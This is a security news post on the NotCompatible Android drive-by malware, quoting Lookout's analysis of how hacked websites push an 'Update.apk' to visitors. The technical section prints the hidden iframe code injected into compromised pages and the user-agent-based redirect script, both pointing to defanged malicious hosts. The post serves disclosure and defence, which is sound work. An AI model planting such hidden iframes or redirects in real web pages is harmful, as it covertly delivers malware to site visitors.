Hacked Sites Infecting Android Mobiles With "drive-by" Malware
Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post-
How it Works :-
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :-
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here.